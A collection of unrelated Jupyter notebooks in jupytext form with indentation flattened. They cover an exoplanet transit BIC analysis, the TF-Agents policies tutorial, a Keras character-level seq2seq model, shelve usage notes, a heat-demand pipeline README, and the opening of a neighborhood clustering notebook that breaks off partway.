trace = pm.load_trace('traces/trace3')
mu, sig = {}, {}
for k, v in trace[0].items():
vals = trace.get_values(k)
mu[k] = np.mean(vals, axis=0)
sig[k] = np.std(vals, axis=0)
ppm = np.array([20, 20, 20])
mu['logsig'] = np.log(ppm * 1e-3)
# +
term1 = xo.gp.terms.SHOTerm(log_S0=mu["logS0"][0],
log_w0=mu["logw"][0],
log_Q=-np.log(np.sqrt(2))
)
term2 = xo.gp.terms.SHOTerm(log_S0=mu["logS0"][1],
log_w0=mu["logw"][1],
log_Q=mu["logQ"]
)
alpha1 = np.exp([0, mu["alpha1"][0], mu["alpha2"][0]])
alpha2 = np.exp([0, mu["alpha1"][1], mu["alpha2"][1]])
kernel = (sgp.terms.KronTerm(term1, alpha=alpha1) +
sgp.terms.KronTerm(term2, alpha=alpha2))
t = np.linspace(-1, 1, 1000)
logsig = np.array(mu["logsig"])
diag = np.exp(2*logsig)[:, None] * np.ones((3, len(t)))
mean = mu["mean"][:, None] * np.ones_like(t)
gp3 = xo.gp.GP(x=t, kernel=kernel, diag=diag, mean=sgp.means.KronMean(mean), J=4)
# +
import bic
r_ratio = np.linspace(0.001, 0.01, 30)
with pm.Model() as model:
delta_bic3 = np.zeros(30)
for i, r in enumerate(r_ratio):
orbit = xo.orbits.KeplerianOrbit(period=5.0)
mean = (xo.LimbDarkLightCurve([0.2, 0.3])
.get_light_curve(orbit=orbit, r=r, t=t, texp=0.02)*1e3).T[0]
mean = tt.ones(3)[:, None] * mean
delta_bic3[i] = xo.eval_in_model(bic.delta_bic(gp3, mean, 4, t), mu)
# +
with pm.Model() as model:
trace = pm.load_trace('traces/trace1')
mu, sig = {}, {}
for k, v in trace[0].items():
vals = trace.get_values(k)
mu[k] = np.mean(vals, axis=0)
sig[k] = np.std(vals, axis=0)
mu['logsig'] = np.log(np.sum((ppm * 1e-3) ** 2) / 3) / 2
# +
term1 = xo.gp.terms.SHOTerm(log_S0=mu["logS0"][0],
log_w0=mu["logw"][0],
log_Q=-np.log(np.sqrt(2))
)
term2 = xo.gp.terms.SHOTerm(log_S0=mu["logS0"][1],
log_w0=mu["logw"][1],
log_Q=mu["logQ"]
)
kernel = term1 + term2
t = np.linspace(-1, 1, 1000)
logsig = mu["logsig"] * tt.ones(len(t))
diag = np.exp(2*logsig)
mean = mu["mean"]
gp1 = xo.gp.GP(x=t, kernel=kernel, diag=diag, mean=mean, J=4)
# +
import bic
r_ratio = np.linspace(0.001, 0.01, 30)
with pm.Model() as model:
delta_bic1 = np.zeros(30)
for i, r in enumerate(r_ratio):
orbit = xo.orbits.KeplerianOrbit(period=5.0)
mean = (xo.LimbDarkLightCurve([0.2, 0.3])
.get_light_curve(orbit=orbit, r=r, t=t, texp=0.02)*1e3).T[0]
x = tt.as_tensor_variable(t)
delta_bic1[i] = xo.eval_in_model(bic.delta_bic(gp1, mean, 4, x), mu)
# +
pl.figure(figsize=(10, 8))
pl.plot(r_ratio, delta_bic1, color=colors[0], linewidth=3, label="one band")
pl.plot(r_ratio, delta_bic3, color=colors[2], linewidth=3, label="three bands")
pl.axhspan(-30, 10, color='k', alpha=0.3)
pl.ylim(-30, 150)
pl.xlabel(r"radius ratio $R_p/R_*$", fontsize=15)
pl.ylabel(r"$\Delta\ \mathrm{BIC}$", fontsize=15)
pl.axvline(0.00915, color='k')
pl.axvline(0.0048, color='k')
pl.axvline(0.0035, color='k')
pl.axvline(0.0025, color='k')
annotation_kwargs = {
"xycoords": 'figure fraction',
"rotation": 90,
"fontsize": 15
}
pl.annotate("Moon", xy=(0.23, 0.5), **annotation_kwargs)
pl.annotate("Mercury", xy=(0.32, 0.5), **annotation_kwargs)
pl.annotate("Mars", xy=(0.44, 0.5), **annotation_kwargs)
pl.annotate("Earth", xy=(0.84, 0.5), **annotation_kwargs)
pl.legend(fontsize=15)
pl.title("Transit detection with solar\n noise observed by SOHO\n", fontsize=20)
# -
y = gp3.dot_l(np.random.randn(3*len(t), 1)).eval()
orbit = xo.orbits.KeplerianOrbit(period=5.0)
mean = (xo.LimbDarkLightCurve([0.2, 0.3])
.get_light_curve(orbit=orbit, r=0.004, t=t, texp=0.02)*1e3).eval()
pl.plot(t, y[::3]+mean-0.5, '.')
pl.plot(t, y[1::3]+mean, '.')
pl.plot(t, y[2::3]+mean+0.5, '.')
|
notebooks/bic.ipynb
|
# + [markdown] colab_type="text" id="1Pi_B2cvdBiW"
# ##### Copyright 2018 The TF-Agents Authors.
# + [markdown] colab_type="text" id="f5926O3VkG_p"
# ### Get Started
# <table class="tfo-notebook-buttons" align="left">
# <td>
# <a target="_blank" href="https://colab.research.google.com/github/tensorflow/agents/blob/master/tf_agents/colabs/policies_tutorial.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" />Run in Google Colab</a>
# </td>
# <td>
# <a target="_blank" href="https://github.com/tensorflow/agents/blob/master/tf_agents/colabs/policies_tutorial.ipynb"><img src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" />View source on GitHub</a>
# </td>
# </table>
# + colab={} colab_type="code" id="xsLTHlVdiZP3"
# Note: If you haven't installed tf-agents yet, run:
# !pip install tf-agents
# + [markdown] colab_type="text" id="lEgSa5qGdItD"
# ### Imports
# + colab={} colab_type="code" id="sdvop99JlYSM"
import abc
import tensorflow as tf
import tensorflow_probability as tfp
nest = tf.contrib.framework.nest
slim = tf.contrib.slim
import numpy as np
from tf_agents.specs import array_spec
from tf_agents.specs import tensor_spec
from tf_agents.environments import time_step as ts
from tf_agents.networks import network
from tf_agents.policies import py_policy
from tf_agents.policies import random_py_policy
from tf_agents.policies import scripted_py_policy
from tf_agents.policies import tf_policy
from tf_agents.policies import random_tf_policy
from tf_agents.policies import actor_policy
from tf_agents.policies import q_policy
from tf_agents.policies import greedy_policy
from tf_agents.policies import py_tf_policy
# Clear any leftover state from previous colabs run.
# (This is not necessary for normal programs.)
tf.reset_default_graph()
# + [markdown] colab_type="text" id="31uij8nIo5bG"
# # Introduction
# + [markdown] colab_type="text" id="PqFn7q5bs3BF"
# In Reinforcement Learning terminology, policies map an observation from the environment to an action or a distribution over actions. In TF-Agents, observations from the environment are contained in a named tuple `TimeStep('step_type', 'discount', 'reward', 'observation')`, and policies map timesteps to actions or distributions over actions. Most policies use `timestep.observation`, some policies use `timestep.step_type` (e.g. to reset the state at the beginning of an episode in stateful policies), but `timestep.discount` and `timestep.reward` are usually ignored.
#
# Policies are related to other components in TF-Agents in the following way. Most policies have a neural network to compute actions and/or distributions over actions from TimeSteps. Agents can contain one or more policies for different purposes, e.g. a main policy that is being trained for deployment, and a noisy policy for data collection. Policies can be saved/restored, and can be used indepedently of the agent for data collection, evaluation etc.
#
# Some policies are easier to write in Tensorflow (e.g. those with a neural network), whereas others are easier to write in Python (e.g. following a script of actions). So in TF agents, we allow both Python and Tensorflow policies. Morever, policies written in TensorFlow might have to be used in a Python environment, or vice versa, e.g. a TensorFlow policy is used for training but later deployed in a production python environment. To make this easier, we provide wrappers for converting between python and TensorFlow policies.
#
# Another interesting class of policies are policy wrappers, which modify a given policy in a certain way, e.g. add a particular type of noise, make a greedy or epsilon-greedy version of a stochastic policy, randomly mix multiple policies etc.
#
# See also:
#
# Different ways of running a policy in an environment (TODO: separate colab. Shows in-graph, eager and python data collection/evaluation.)
# + [markdown] colab_type="text" id="NyXO5-Aalb-6"
# # Python Policies
# + [markdown] colab_type="text" id="DOtUZ1hs02bu"
# The interface for Python policies is defined in `policies/py_policy.Base`. The main methods are:
#
#
# + colab={} colab_type="code" id="4PqNEVls1uqc"
class Base(object):
@abc.abstractmethod
def __init__(self, time_step_spec, action_spec, policy_state_spec=()):
self._time_step_spec = time_step_spec
self._action_spec = action_spec
self._policy_state_spec = policy_state_spec
@abc.abstractmethod
def reset(self, policy_state=()):
# return initial_policy_state.
pass
@abc.abstractmethod
def action(self, time_step, policy_state=()):
# return a PolicyStep(action, state, info) named tuple.
pass
@abc.abstractmethod
def distribution(self, time_step, policy_state=()):
# Not implemented in python, only for TF policies.
pass
@abc.abstractmethod
def update(self, policy):
# update self to be similar to the input `policy`.
pass
@abc.abstractmethod
def copy(self):
# return a copy of self.
pass
@property
def time_step_spec(self):
return self._time_step_spec
@property
def action_spec(self):
return self._action_spec
@property
def policy_state_spec(self):
return self._policy_state_spec
# + [markdown] colab_type="text" id="16kyDKk65bka"
# The most important method is `action(time_step)` which maps a `time_step` containing an observation from the environment to a PolicyStep named tuple containing the following attributes:
#
# * `action`: The action to be applied to the environment.
# * `state`: The state of the policy (e.g. RNN state) to be fed into the next call to action.
# * `info`: Optional side information such as action log probabilities.
#
# TODO: Add examples of stateful policies, and explain `state` and `info` in more detail.
#
# The `time_step_spec` and `action_spec` are specifications for the input time step and the output action. Policies also have a `reset` function which is typically used for resetting the state in stateful policies. The `copy` function returns a copy of `self` and the `update(new_policy)` function updates `self` towards `new_policy`.
#
# Now, let us look at a couple of examples of python policies.
#
# + [markdown] colab_type="text" id="YCH1Hs_WlmDT"
# ## Example 1: Random Python Policy
# + [markdown] colab_type="text" id="lbnQ0BQ3_0N2"
# A simple example of a `PyPolicy` is the `RandomPyPolicy` which generates random actions for the discrete/continuous given action_spec. The input `time_step` is ignored.
# + colab={} colab_type="code" id="QX8M4Nl-_0uu"
action_spec = array_spec.BoundedArraySpec((2,), np.int32, -10, 10)
# Is there a way to avoid `my` in the variable names?
my_random_py_policy = random_py_policy.RandomPyPolicy(time_step_spec=None,
action_spec=action_spec)
time_step = None
action_step = my_random_py_policy.action(time_step)
print(action_step)
action_step = my_random_py_policy.action(time_step)
print(action_step)
# + [markdown] colab_type="text" id="B8WrFOR1lz31"
# ## Example 2: Scripted Python Policy
# + [markdown] colab_type="text" id="AJ0Br1lGBnTT"
# A scripted policy plays back a script of actions represented as a list of `(num_repeats, action)` tuples. Every time the `action` function is called, it returns the next action from the list until the specified number of repeats is done, and then moves on to the next action in the list. The `reset` method can be called to start executing from the beginning of the list.
# + colab={} colab_type="code" id="_mZ244m4BUYv"
action_spec = array_spec.BoundedArraySpec((2,), np.int32, -10, 10)
action_script = [(1, np.array([5, 2], dtype=np.int32)),
(0, np.array([0, 0], dtype=np.int32)), # Setting `num_repeates` to 0 will skip this action.
(2, np.array([1, 2], dtype=np.int32)),
(1, np.array([3, 4], dtype=np.int32))]
my_scripted_py_policy = scripted_py_policy.ScriptedPyPolicy(
time_step_spec=None, action_spec=action_spec, action_script=action_script)
policy_state = my_scripted_py_policy.get_initial_state()
time_step = None
print('Executing scripted policy...')
action_step = my_scripted_py_policy.action(time_step, policy_state)
print(action_step)
action_step= my_scripted_py_policy.action(time_step, action_step.state)
print(action_step)
action_step = my_scripted_py_policy.action(time_step, action_step.state)
print(action_step)
print('Resetting my_scripted_py_policy...')
policy_state = my_scripted_py_policy.get_initial_state()
action_step = my_scripted_py_policy.action(time_step, policy_state)
print(action_step)
# + [markdown] colab_type="text" id="3Dz7HSTZl6aU"
# # TensorFlow Policies
# + [markdown] colab_type="text" id="LwcoBXqKl8Yb"
# TensorFlow policies follow the same interface as Python policies. Let us look at a few examples.
# + [markdown] colab_type="text" id="3x8pDWEFrQ5C"
# ## Example 1: Random TF Policy
#
# A RandomTFPolicy can be used to generate random actions according to a given discrete/continuous `action_spec`. The input `time_step` is ignored.
#
#
# + colab={} colab_type="code" id="nZ3pe5G4rjrW"
action_spec = tensor_spec.BoundedTensorSpec(
(2,), tf.float32, minimum=-1, maximum=3)
observation_spec = tensor_spec.TensorSpec((2,), tf.float32)
time_step_spec = ts.time_step_spec(observation_spec)
my_random_tf_policy = random_tf_policy.RandomTFPolicy(
action_spec=action_spec, time_step_spec=time_step_spec)
observation = tf.ones(time_step_spec.observation.shape)
time_step = ts.restart(observation)
action_step = my_random_tf_policy.action(time_step)
with tf.Session() as sess:
print(action_step)
# Generate an action
print(sess.run(action_step))
# Generate a different action
print(sess.run(action_step))
# + [markdown] colab_type="text" id="GOBoWETprWCB"
# ## Example 2: Actor Policy
#
# An actor policy can be created using either a network that maps `time_steps` to actions or a network that maps `time_steps` to distributions over actions.
#
# + [markdown] colab_type="text" id="2S94E5zQgge_"
# ### Using an action network
# + [markdown] colab_type="text" id="X2LM5STNgv1u"
# Let us define a network as follows:
# + colab={} colab_type="code" id="S2wFgzJFteQX"
class ActionNet(network.Network):
def __init__(self, observation_spec, action_spec):
super(ActionNet, self).__init__(
observation_spec=observation_spec,
action_spec=action_spec,
state_spec=(),
name='ActionNet')
self._layers = [
tf.keras.layers.Dense(
action_spec.shape.num_elements(), activation=tf.nn.tanh),
]
def call(self, observations, step_type, network_state):
del step_type
output = tf.to_float(observations)
for layer in self.layers:
output = layer(output)
actions = tf.reshape(output, [-1] + self.action_spec.shape.as_list())
# Scale and shift actions to the correct range if necessary.
return actions, network_state
# + [markdown] colab_type="text" id="k7fIn-ybVdC6"
# In TensorFlow most network layers are designed for batch operations, so we expect the input time_steps to be batched, and the output of the network will be batched as well. Also the network is responsible for producing actions in the correct range of the given action_spec. This is conventionally done using e.g. a tanh activation for the final layer to produce actions in [-1, 1] and then scaling and shifting this to the correct range as the input action_spec (e.g. see `tf_agents/agents/ddpg/networks.actor_network()`).
#
# Now, we an create an actor policy using the above network.
# + colab={} colab_type="code" id="0UGmFTe7a5VQ"
observation_spec = tensor_spec.TensorSpec((4,), tf.float32)
time_step_spec = ts.time_step_spec(observation_spec)
action_spec = tensor_spec.BoundedTensorSpec((3,),
tf.float32,
minimum=-1,
maximum=1)
action_net = ActionNet(observation_spec, action_spec)
my_actor_policy = actor_policy.ActorPolicy(
time_step_spec=time_step_spec,
action_spec=action_spec,
actor_network=action_net)
# + [markdown] colab_type="text" id="xlmGPTAmfPK3"
# We can apply it to any batch of time_steps that follow time_step_spec:
# + colab={} colab_type="code" id="fvsIsR0VfOA4"
batch_size = 2
observations = tf.ones([2] + time_step_spec.observation.shape.as_list())
# TODO: Why doesn't restart infer batch_size from observations?
time_step = ts.restart(observations, batch_size)
action_step = my_actor_policy.action(time_step)
distribution_step = my_actor_policy.distribution(time_step)
print('Action distribution:')
print(distribution_step)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
print('Action:')
print(sess.run(action_step))
print('Another action (same because it is deterministic):')
print(sess.run(action_step))
# + [markdown] colab_type="text" id="lumtyhejZOXR"
# In the above example, we created the policy using an action network that produces an action tensor. In this case, `policy.distribution(time_step)` is a deterministic (delta) distribution around the output of `policy.action(time_step)`. One way to produce a stochastic policy is to wrap the actor policy in a policy wrapper that adds noise to the actions (see XXX). Another way is to create the actor policy using an action distribution network instead of an action network as shown below.
# + [markdown] colab_type="text" id="_eNrJ5gKgl3W"
# ### Using an action distribution network
# + colab={} colab_type="code" id="sSYzC9LobVsK"
class ActionDistributionNet(ActionNet):
def call(self, observations, step_type, network_state):
action_means, network_state = super(ActionDistributionNet, self).call(
observations, step_type, network_state)
action_std = tf.ones_like(action_means)
return tfp.distributions.Normal(action_means, action_std), network_state
action_distribution_net = ActionDistributionNet(observation_spec, action_spec)
my_actor_policy = actor_policy.ActorPolicy(
time_step_spec=time_step_spec,
action_spec=action_spec,
actor_network=action_distribution_net)
action_step = my_actor_policy.action(time_step)
distribution_step = my_actor_policy.distribution(time_step)
print('Action distribution:')
print(distribution_step)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
print('Action:')
print(sess.run(action_step))
print('Another action (different, but sampled from the same distribution):')
print(sess.run(action_step))
# + [markdown] colab_type="text" id="BzoNGJnlibtz"
# Note that in the above, actions are clipped to the range of the given action spec [-1, 1]. This is because a constructor argument of ActorPolicy clip=True by default. Setting this to false will return unclipped actions produced by the network.
# + [markdown] colab_type="text" id="PLj6A-5domNG"
# Stochastic policies can be converted to deterministic policies using, for example, a GreedyPolicy wrapper which chooses `stochastic_policy.distribution().mode()` as its action, and a deterministic/delta distribution around this greedy action as its `distribution()`.
# + [markdown] colab_type="text" id="4Xxzo2a7rZ7v"
# ## Example 3: Q Policy
# + [markdown] colab_type="text" id="79eGLqpOhQVp"
# A Q policy is used in agents like DQN and is based on a Q network that predicts a Q value for each discrete action. For a given time step, the action distribution in the Q Policy is a categorical distribution created using the q values as logits.
#
#
# + colab={} colab_type="code" id="Haakr2VvjqKC"
observation_spec = tensor_spec.TensorSpec((4,), tf.float32)
time_step_spec = ts.time_step_spec(observation_spec)
action_spec = tensor_spec.BoundedTensorSpec((1,),
tf.int32,
minimum=-1,
maximum=1)
num_actions = action_spec.maximum - action_spec.minimum + 1
class QNetwork(network.Network):
def __init__(self, observation_spec, action_spec, num_actions=2, name=None):
super(QNetwork, self).__init__(
observation_spec=observation_spec,
action_spec=action_spec,
state_spec=(),
name=name)
self._layers.append(tf.keras.layers.Dense(num_actions))
def call(self, inputs, unused_step_type=None, network_state=()):
inputs = tf.cast(inputs, tf.float32)
for layer in self.layers:
inputs = layer(inputs)
return inputs, network_state
batch_size = 2
observation = tf.ones([batch_size] + time_step_spec.observation.shape.as_list())
time_steps = ts.restart(observation, batch_size=batch_size)
my_q_network = QNetwork(
observation_spec=observation_spec,
action_spec=action_spec)
my_q_policy = q_policy.QPolicy(
time_step_spec, action_spec, q_network=my_q_network)
action_step = my_q_policy.action(time_steps)
distribution_step = my_q_policy.distribution(time_steps)
print('Action distribution:')
print(distribution_step)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
print('Action:')
print(sess.run(action_step))
# + [markdown] colab_type="text" id="Xpu9m6mvqJY-"
# # Policy Wrappers
# + [markdown] colab_type="text" id="OfaUrqRAoigk"
# A policy wrapper can be used to wrap and modify a given policy, e.g. add noise. Policy wrappers are a subclass of Policy (Python/TensorFlow) and can therefore be used just like any other policy.
# + [markdown] colab_type="text" id="-JJVVAALqVNQ"
# ## Example: Greedy Policy
#
#
# A greedy wrapper can be used to wrap any TensorFlow policy that implements `distribution()`. `GreedyPolicy.action()` will return `wrapped_policy.distribution().mode()` and `GreedyPolicy.distribution()` is a deterministic/delta distribution around `GreedyPolicy.action()`:
# + colab={} colab_type="code" id="xsRPBeLZtXvu"
my_greedy_policy = greedy_policy.GreedyPolicy(my_q_policy)
action_step = my_greedy_policy.action(time_steps)
distribution_step = my_greedy_policy.distribution(time_steps)
print('action distribution:')
print(distribution_step)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
print('action:')
print(sess.run(action_step))
# + [markdown] colab_type="text" id="9S1nuBWWv7hx"
# ## Example: Noise Policy
#
#
# + [markdown] colab_type="text" id="v4apnYjbzd1Q"
# TODO: Either use the existing OUNoise policy (a little complex and out of the blue) or implement a simpler noise policy.
# + [markdown] colab_type="text" id="aO2SLKMev_QI"
# For other common examples of wrappers see:
# 1. EpsilonGreedyPolicy: Like Greedy policy, but sometimes (with probability epsilon) chooses a random action.
# 2. MixturePolicy: Takes a list of policies and generates an action from one of these at random.
# + [markdown] colab_type="text" id="WgpZtEr2mBML"
#
# # Wrapping a TFPolicy as a Python Policy
# + [markdown] colab_type="text" id="BJ8ApdrO-qF8"
# Most policies are written in TensorFlow because they contain one or more networks to be trained. However, we may still need to use these policies in a python environment, e.g. to collect data, deployment or evaluation. The PyTFPolicy class can be used to wrap any TF policy as a PyPolicy object.
# + colab={} colab_type="code" id="Tc96-0Sb0eX_"
my_py_tf_policy = py_tf_policy.PyTFPolicy(my_random_tf_policy)
observation = np.array([3, 4])
time_step = ts.restart(observation)
my_py_tf_policy.session = tf.Session()
action_step = my_py_tf_policy.action(time_step)
print('action:')
print(action_step)
# + [markdown] colab_type="text" id="iGyfO34AwYP_"
# Another way to use TensorFlow policies in python is to save the TF policies as checkpoints and load them as a PyTFCheckpointPolicy. See saving and restoring policies for more details.
# + [markdown] colab_type="text" id="EszYIwrDxJta"
# # Saving and Restoring Policies (TODO: oars)
# + [markdown] colab_type="text" id="Xh2vcLRnAbVe"
#
|
tf_agents/colabs/policies_tutorial.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
from __future__ import print_function
from keras.models import Model
from keras.layers import Input, LSTM, Dense
import numpy as np
# -
# # Param
batch_size = 64 # Batch size for training.
epochs = 100 # Number of epochs to train for.
latent_dim = 256 # Latent dimensionality of the encoding space.
num_samples = 20000 # Number of samples to train on.
# Path to the data txt file on disk.
data_path = 'fra-eng/fra.txt'
# # Data
input_texts = []
target_texts = []
input_characters = set()
target_characters = set()
with open(data_path, 'r', encoding='utf-8') as f:
lines = f.read().split('\n')
np.array(lines).shape
lines[0]
# - Processing data
for line in lines[: min(num_samples, len(lines) - 1)]:
input_text, target_text, attribution = line.split('\t')
# We use "tab" as the "start sequence" character
# for the targets, and "\n" as "end sequence" character.
target_text = '\t' + target_text + '\n'
input_texts.append(input_text)
target_texts.append(target_text)
# Get unique characters
for char in input_text:
if char not in input_characters:
input_characters.add(char)
for char in target_text:
if char not in target_characters:
target_characters.add(char)
np.array(input_texts).shape
input_texts[0]
np.array(target_texts).shape
target_texts[0]
input_characters
target_characters
input_characters = sorted(list(input_characters))
target_characters = sorted(list(target_characters))
num_encoder_tokens = len(input_characters)
num_decoder_tokens = len(target_characters)
max_encoder_seq_length = max([len(txt) for txt in input_texts])
max_decoder_seq_length = max([len(txt) for txt in target_texts])
print('Number of samples:', len(input_texts))
print('Number of unique input tokens:', num_encoder_tokens)
print('Number of unique output t0okens:', num_decoder_tokens)
print('Max sequence length for inputs:', max_encoder_seq_length)
print('Max sequence length for outputs:', max_decoder_seq_length)
# - Build character dictionary
input_token_index = dict(
[(char, i) for i, char in enumerate(input_characters)])
target_token_index = dict(
[(char, i) for i, char in enumerate(target_characters)])
input_token_index
target_token_index
# # Build encoder & decoder input
# - Init input
encoder_input_data = np.zeros(
(len(input_texts), max_encoder_seq_length, num_encoder_tokens),
dtype='float32')
decoder_input_data = np.zeros(
(len(input_texts), max_decoder_seq_length, num_decoder_tokens),
dtype='float32')
decoder_target_data = np.zeros(
(len(input_texts), max_decoder_seq_length, num_decoder_tokens),
dtype='float32')
# - One-hot vector
for i, (input_text, target_text) in enumerate(zip(input_texts, target_texts)):
for t, char in enumerate(input_text):
encoder_input_data[i, t, input_token_index[char]] = 1.
encoder_input_data[i, t + 1:, input_token_index[' ']] = 1.
for t, char in enumerate(target_text):
# decoder_target_data is ahead of decoder_input_data by one timestep
decoder_input_data[i, t, target_token_index[char]] = 1.
if t > 0:
# decoder_target_data will be ahead by one timestep
# and will not include the start character.
decoder_target_data[i, t - 1, target_token_index[char]] = 1.
decoder_input_data[i, t + 1:, target_token_index[' ']] = 1.
decoder_target_data[i, t:, target_token_index[' ']] = 1.
# - Print encoder_input_data
input_texts[0]
# ' ': index 0
encoder_input_data[0]
# G: Index 26
encoder_input_data[0][0][26]
# o: Index 58
encoder_input_data[0][1][58]
# - Print decoder_input_data
# \t: start, \n: end
target_texts[0]
# ' ': index 2
decoder_input_data[0]
# V: Index 43
decoder_input_data[0][1][43]
# ' ': index 2
decoder_target_data[0]
# V: Index 43
decoder_target_data[0][0][43]
# # Encode & Decoder (implementation of sequence-to-sequence)
# - Return_state & return_sequences param of LSTM: https://www.dlology.com/blog/how-to-use-return_state-or-return_sequences-in-keras/
# - Encoder states (context vector): initial hidden state of decoder
# - Teacher Forcing: https://towardsdatascience.com/what-is-teacher-forcing-3da6217fed1c
# - Encoder
# Define an input sequence and process it.
encoder_inputs = Input(shape=(None, num_encoder_tokens))
encoder = LSTM(latent_dim, return_state=True)
encoder_outputs, state_h, state_c = encoder(encoder_inputs)
# We discard `encoder_outputs` and only keep the states.
encoder_states = [state_h, state_c] # Context vector of encoder
# - Decoder
# Set up the decoder, using `encoder_states` as initial state.
decoder_inputs = Input(shape=(None, num_decoder_tokens))
# We set up our decoder to return full output sequences,
# and to return internal states as well. We don't use the
# return states in the training model, but we will use them in inference.
decoder_lstm = LSTM(latent_dim, return_sequences=True, return_state=True)
decoder_outputs, _, _ = decoder_lstm(decoder_inputs,
initial_state=encoder_states)
decoder_dense = Dense(num_decoder_tokens, activation='softmax')
decoder_outputs = decoder_dense(decoder_outputs)
# - Model
# +
# Define the model that will turn
# `encoder_input_data` & `decoder_input_data` into `decoder_target_data`
model = Model([encoder_inputs, decoder_inputs], decoder_outputs)
# Run training
model.compile(optimizer='rmsprop', loss='categorical_crossentropy',
metrics=['accuracy'])
# -
# # Train
import keras.backend.tensorflow_backend as K
with K.tf.device('/gpu:1'):
model.fit([encoder_input_data, decoder_input_data], decoder_target_data,
batch_size=batch_size,
epochs=epochs,
validation_split=0.2)
# Save model
model.save('s2s.h5')
# # Test
# +
# Next: inference mode (sampling).
# Here's the drill:
# 1) encode input and retrieve initial decoder state
# 2) run one step of decoder with this initial state
# and a "start of sequence" token as target.
# Output will be the next target token
# 3) Repeat with the current target token and current states
# Define sampling models
encoder_model = Model(encoder_inputs, encoder_states)
decoder_state_input_h = Input(shape=(latent_dim,))
decoder_state_input_c = Input(shape=(latent_dim,))
decoder_states_inputs = [decoder_state_input_h, decoder_state_input_c]
decoder_outputs, state_h, state_c = decoder_lstm(
decoder_inputs, initial_state=decoder_states_inputs)
decoder_states = [state_h, state_c]
decoder_outputs = decoder_dense(decoder_outputs)
decoder_model = Model(
[decoder_inputs] + decoder_states_inputs,
[decoder_outputs] + decoder_states)
# -
# Reverse-lookup token index to decode sequences back to
# something readable.
reverse_input_char_index = dict(
(i, char) for char, i in input_token_index.items())
reverse_target_char_index = dict(
(i, char) for char, i in target_token_index.items())
reverse_input_char_index
reverse_target_char_index
def decode_sequence(input_seq):
# Encode the input as state vectors.
states_value = encoder_model.predict(input_seq)
# Generate empty target sequence of length 1.
target_seq = np.zeros((1, 1, num_decoder_tokens))
# Populate the first character of target sequence with the start character.
target_seq[0, 0, target_token_index['\t']] = 1.
# Sampling loop for a batch of sequences
# (to simplify, here we assume a batch of size 1).
stop_condition = False
decoded_sentence = ''
while not stop_condition:
output_tokens, h, c = decoder_model.predict(
[target_seq] + states_value)
# Sample a token
sampled_token_index = np.argmax(output_tokens[0, -1, :])
sampled_char = reverse_target_char_index[sampled_token_index]
decoded_sentence += sampled_char
# Exit condition: either hit max length
# or find stop character.
if (sampled_char == '\n' or
len(decoded_sentence) > max_decoder_seq_length):
stop_condition = True
# Update the target sequence (of length 1).
target_seq = np.zeros((1, 1, num_decoder_tokens))
target_seq[0, 0, sampled_token_index] = 1.
# Update states
states_value = [h, c]
return decoded_sentence
for seq_index in range(100):
# Take one sequence (part of the training set)
# for trying out decoding.
input_seq = encoder_input_data[seq_index: seq_index + 1]
decoded_sentence = decode_sequence(input_seq)
print('-')
print('Input sentence:', input_texts[seq_index])
print('Decoded sentence:', decoded_sentence)
|
Seq2seq_model_keras_character-level.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Shelve
# - Simple key-value database
# - Useful if you don't have sufficient RAM
# - Cannot use integers as keys (but can convert them to a string)
# - Use `del` to delete keys
#
# ## Writing to shelve
s = shelve.open('data.db')
s['info'] = 55
s.close()
# ## Reading Shelve
s = shelve.open('data.db')
info = s['info']
s.close()
|
notebooks/shelve.ipynb
|
# ---
# jupyter:
# jupytext:
# cell_metadata_filter: -all
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
# # Heat Demand Density
#
# ## What `pipeline.py` is doing:
#
# - Load:
# - Valuation Office Floor Areas
# - Residential Small Area Building Energy Ratings
# - CIBSE TM46 & Guide F Energy Benchmarks
# - Valuation Office Uses linked to Benchmark Categories
# - Local Authority Boundaries
# - Small Area 2016 Boundaries
# - Link Small Areas to Local Authorities
# - Link Valuation Office to Small Areas
# - Apply CIBSE benchmarks to Valuation Office Floor Areas to estimate Non-Residential Heat Demand - *assuming a typical boiler efficiency of 90%*
# - Extract individual building DEAP annual space heat and hot water demand estimates to estimate Residential Heat Demand
# - Amalgamate Heat Demands from individual building level to Small Area level
# - Calculate Demand Density by dividing Small Area Demands by Small Area Polygon Area (km2)
# - Link Small Area Demands to Local Authorities
# - Save Small Area Demands as a GIS-compatible `geojson` map.
#
# ## Caveats
#
# To fully reproduce the pipeline the user must:
# - Have access to the codema-dev s3 to access the underlying Codema-only datasets - *i.e. they need an authenticated AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY*
# - Be comfortable enough with the command line to create a conda environment from an `environment.yml` and run the pipeline with `python pipeline.py`
#
# To open up this methodology to the public the pipeline could be adapted to default to public data if it can't connect to s3, however, this would only be worthwhile if a UI entrypoint to the ETL was created to mitigate the need for command line usage
# ## Setup
#
# | ❗ Skip if running on Binder |
# |-------------------------------|
#
# Via [conda](https://github.com/conda-forge/miniforge):
conda env create --file environment.yml
conda activate hdd
# ## Run
# !ploomber build
|
plot-district-heating-viability/README.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import pandas as pd
from GEOSNAP2NAM import Aspatial_Clustering_viz
from GEOSNAP2NAM import Aspatial_Clustering_log
# +
#sample = "downloads/LTDB_Std_All_Sample.zip"
#full = "downloads/LTDB_Std_All_fullcount.zip"
#store_ltdb(sample=sample, fullcount=full)
#store_census()
# -
param = {
'title': "Neighborhood Analysis: Kmeans, San Diego",
'filename_suffix': "San Diego", # "Albertville"
'state_fips': None,
'msa_fips': "41740", # "10700"
'county_fips': None,
